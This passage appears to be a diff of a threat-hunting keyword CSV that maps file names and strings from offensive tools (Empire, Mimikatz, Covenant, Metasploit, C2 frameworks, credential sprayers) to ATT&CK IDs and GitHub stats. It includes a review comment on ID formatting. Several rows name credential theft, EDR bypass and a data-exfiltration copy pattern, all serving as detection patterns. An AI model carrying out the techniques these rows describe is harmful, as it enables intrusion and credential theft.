@@ -8721,14 +8869,14 @@ "*ContainYourselfPoc.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourselfPoc\*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*ContainYourselfTempFile.txt*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" -"*ContentHijacking.swf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*ConvertFrom-LDAPLogonHours*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Convert-NT4toCanonical*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*ConvertTo-LogonHoursArray*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ConvertTo-Rc4ByteStream*","offensive_tool_keyword","empire","empire function name. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ConvertTo-ROT13.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*ContentHijacking.swf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ConvertFrom-LDAPLogonHours*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Convert-NT4toCanonical*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of 
Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*ConvertTo-LogonHoursArray*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ConvertTo-Rc4ByteStream*","offensive_tool_keyword","empire","empire function name. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ConvertTo-ROT13.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" "*ConvertTo-Shellcode -*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","0","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" -"*ConvertToShellcode*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*ConvertToShellcode*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*ConvertTo-Shellcode.*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. 
Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" "*ConvertTo-Shellcode.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*ConvertToShellcode.py*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" 
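Review bot: The `*ConvertToShellcode*` nimplant row re-emitted on the `+` side still carries `T1059-001` and lists `TA0002` twice, whereas the ContainYourself and Empire rows in this hunk write sub-techniques with a dot (`T1562.004`, `T1548.002`); the `*compile_implant*` row earlier in the diff has the same value. The `*ConvertTo-ROT13.ps1*` nishang row (like the unchanged sRDI rows) keeps `T1550 T1555 T1212 T1558` without the ` - ` separator and has `N/A` for tactics. A consumer that maps these columns to ATT&CK presumably splits on ` - ` and matches dotted IDs, so these rows would likely fall out of technique-based coverage reports. Since the rows are being rewritten for the star and fork counts anyway, I would normalise them in the same pass: `"T1059.001 - T1027 - T1036","TA0002 - TA0005"` for nimplant and `"T1550 - T1555 - T1212 - T1558"` for nishang.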
@@ -8759,32 +8907,32 @@ "*CopyAndPasteEnum.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*CopyAndPasteFileDownloader.bat*","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","8","710","185","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*Copy-Item -Path * -Destination \\$IP\transfer*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*Copyright (c) 2023 whoamianony.top*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" -"*core/handler/reverse*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*core/handler/reverse*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*core/sprayers/lync.py*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*core/teamserver/stagers/*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*CoreSecurity/impacket/*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*corscanner -i urls.txt -t 100*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Could not write NTLM Hashes to the specified JTR_Dump_Path *","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*Couldn't clone GPO {} (maybe it does not exist?*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*Covenant.API*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Covenant.csproj*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Covenant.exe*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Covenant.Models*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Covenant.sln*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Covenant/Covenant*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*Covenant/wwwroot*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantAPI.*","offensive_tool_keyword","covenant","Covenant is a collaborative 
.NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantAPIExtensions.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantBaseMenuItem.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantService.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" -"*CovenantUser.cs*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 
